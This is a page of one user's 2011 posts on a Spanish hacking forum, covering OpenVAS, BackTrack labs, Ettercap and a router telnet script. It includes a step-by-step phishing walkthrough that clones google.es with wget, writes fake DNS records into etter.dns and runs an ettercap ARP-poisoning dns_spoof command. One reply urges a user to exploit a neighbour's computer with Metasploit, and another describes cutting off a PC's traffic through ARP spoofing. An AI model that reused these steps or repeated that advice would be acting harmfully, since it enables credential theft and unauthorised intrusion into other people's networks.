elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14
111  Seguridad Informática / Seguridad / Re: Escanear maquina con openvas en: 3 Abril 2011, 22:28 pm
El server lo puedes tener en la maquina atacante, quien realiza el escaneo es el servidor,por lo que no puedes ejecutar OpenVas si no está ejecutandose.


tienes que crear un usuario con:
openvas-adduser,

y no olvides de crear los certificados
openvas-mkcert

actualiza antes de arrancar el server:
openvas-nvt-sync

y finalmente arrancalo:
openvasd
112  Seguridad Informática / Seguridad / Re: Como crear servidor web irrastreable? en: 3 Abril 2011, 21:43 pm
Realmente los servidores estan localizados en Estocolmo,pertenecen a la compañia Bahnhof ISP,la cual se dedica a alojar y dar servicios de internet.

La historia de los espejos es posterior,tras el escandalo de Assange, los servidores de Bahnhof sufren continuos ataques, por lo que se ha comenzado a repartir las páginas en servidores por todo el mundo,solicitandose mirrors voluntarios.

Si quieres ver ver el bunker bajo tierra donde Wikileaks tiene sus servidores:
   http://www.fotograf.nu/360/bahnhof/

Para ofrecer un servidor como mirror mira aquí:
http://sarkasstiko.com/2011/02/22/colabora-siendo-servidor-espejo-de-wikileaks/



113  Seguridad Informática / Hacking / Re: servidor en ordenador en: 26 Marzo 2011, 08:08 am
Back Track es una distribucion Linux,pero orientada al analisis de vulnerabilidades, esta basada en Debian Ubuntu.
Descargate la ISO y montala como una maquina mas en el Virtual Box, y cuando termine el primer arranque ejecuta el shell que te aparecerá en el escritorio, llamado install.sh. Con esto conseguiras dejarlo instalado permanentemente.
114  Seguridad Informática / Hacking / Re: servidor en ordenador en: 25 Marzo 2011, 22:35 pm
Para comenzar , una vez que tengas la máquina virtual de Oracle, instalate un par de máquinas, como un Server 2003 de Microsoft y algun Windows, como el Xp.

Como equipo atacante te recomendaría Linux y mas concretamente el Back Track.

La ventaja de usar una máquina virtual es que puedes montarlas en modo anfitrion y realizar ataques desde un operativo hacia el otro, con lo cual es una gran solucion para el aprendizaje ó para probar vulnerabilidades, sin afectar a tu sistema operativo host.

El Back Trak en modo live tiene sus inconvenientes, por ejemplo si vas a utilizar el OpenVas para analizar vulnerabilidades, el primer paso es actualizar los pluggins, este proceso suele ocupar bastante tiempo, y si lo montas en modo live tendrias que realizarlo cada vez hayas apagado la máquina,porque no te almacenará las descargas.

Con el Metasploit te ocurrirá lo mismo, los nuevos exploits y payloads los perderas cada vez que apagues la máquina
115  Seguridad Informática / Hacking / Re: ayuda urgente¡¡¡¡ me vecino se mete me red en: 25 Marzo 2011, 22:28 pm
Ya que usas Back Track, aprovecha que tienes varias herramientas instaladas.
Primero realiza un scaneo de sus vulnerabilidades, para esto puedes usan el Openvas.Cuando tengas esa información,intenta aprovechar alguna vulnerabilidad de su equipo, por ejemplo con Metasploit..

Ambos programas necesitan conocimientos apropiados, por lo que te recomiendo que comienzes por estudiar un poco sobre protocolos,redes y seguridad.
116  Seguridad Informática / Hacking / Re: Bloquear internet a PC con Ettercap ?? en: 25 Marzo 2011, 22:20 pm
Si utilizas el Ettercap, configuras un ataque MITM, tipo ARP_Spoof, por ejemplo y no comienzas a sniffar, bloquearas todo el trafico producido entre ese equipo y el router. Los paquetes llegarán al equipo atacante y ahí morirán, no seran reenviados.
117  Seguridad Informática / Hacking / Re: algun sniffer sencillo ? en: 24 Marzo 2011, 10:24 am
El Wireshark es mas un sniffer orientado al analisis de tráfico, el Ettercap no te da tanta información sobre los paquetes que circulan, su uso está destinado para otros fines mas definidos,como ataques MITM,sniffer de contraseñas, DNS spoof , etc...
118  Seguridad Informática / Hacking / Re: problema con spy-net en: 24 Marzo 2011, 10:02 am
Para utilizar la consola desde Windows, lo que tienes que ejecutar es el comando cmd,el cual te abre una consola tipo DOS, ahora puedes introducir el ipconfig/all para ver la ip,MAC y demas datos de tu adaptador de red.

Es posible que tu red sea la misma que la del video, normalmente los router de las operadoras Telefónica, ONO, etc utilizan la red 192.168.1.0/24 para la red privada. Si quieres saber porqué te recomiendo que busques informacion sobre el ARIN , que es organismo que define que redes son para uso privado y publico.

Utilizar un capturador de pantallas como el snagit para ver tu IP es lo mas extraño que nunca habia visto.
119  Seguridad Informática / Hacking / Re: es posible crear programa para descargar de servidores cambiando ip? en: 24 Marzo 2011, 09:55 am
Yo uso el JDownloader combinado con un programa llamado TST10.exe , es un TELNET, pero que se ejecuta desde un script , por ejemplo para un router
Zyxel utilizo el siguiente .bat , lo ejecuto y en unos 2 segundos tienes una nueva IP pública:

192.168.1.1
WAIT "Password:"
SEND "1234\m"
SEND "24\m"
SEND "8\m"
WAIT "ras>"
SEND "poe drop poe0\m"
WAIT "ras>"
SEND "e\m"
SEND "99\m"

120  Seguridad Informática / Hacking / Redireccionar el tráfico de una página Web a una pagina falsa - phising en: 22 Marzo 2011, 10:24 am
Para este ejercicio se falseará la página Web de www.google.es.

El primer paso será descargar la página original, para luego modificarla y cuando el equipo víctima intente acceder a www.google.es, la página que le será servida será la que yo he modificado.

Desde el equipo atacante, Linux (Back-Trak 4.2 en este caso), se procede a la descarga de la página original,

para ello utilizaremos wget (Fig. 6-1)

Wget -r -d 3 www.google.es

Las opciones utilizadas son:

-r Para que realiza una descarga recursiva, con lo que intentará descargar el contenido
De cada uno de los enlaces que se encuentren en dicha página y así con cualquier
enlace encontrado, recursivamente.
-d Para fijar la profundidad de la recursividad, solo voy a descargar 3 niveles de
Enlaces en este ejercicio.

Seguidamente consultamos el directorio por defecto para el servidor Web Apache,
mirando el archivo: /etc/apache2/sites-available

Como podemos observar en la imagen 6-2, el directorio por defecto es /var/www/

Modificaremos nuestra falsa página y la ubicaremos en el directorio señalado
anteriormente y lanzamos el servidor Apache.

Modificar el archivo /usr/share/ettercap/etter.dns, para crear las falsas resoluciones DNS que conduzcan a la victima hacia nuestro servidor Apache. (Fig. 6-4)

Añadir nuestras falsas DNS:
*.google.es A 172.30.2.100
*.google.com A 172.30.2.100
(Siendo 172.30.2.100 sea nuestra dirección IP)

Lanzar ataque MITM con falsificación de DNS, para ello utilizamos Ettercap, modo consola: (Fig. 6-5)

ettercap -q -T -M arp -P dns_spoof /172.30.2.129/ /172.30.2.131/ -n
255.255.255.0


-q modo silencioso, no imprime en pantalla los paquetes enviados
-T Usado solo en modo texto
-M Activa ataque MITM
Arp método utilizado en el MITM (arp Poisoning, en este caso)
-P Utilizar un plugging
dns_spoof Éste es el plugin seleccionado
/ip_addres/ Una de las IP para atacar
/ip_addres/ la otra IP
-n <netmask> Usado en caso de cambio de segmento de red,máscara

El resultado del envenenamiento, desde el equipo cliente, al intentar acceder a la página
www.google.es, éste será dirigido hacia la falsificación creada en el equipo atacante.


Aqui está el ejercicio completo con imágenes y en Español:

http://rapidshare.com/files/453789692/Direccionamiento_phising_WEB_SITE.pdf

Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines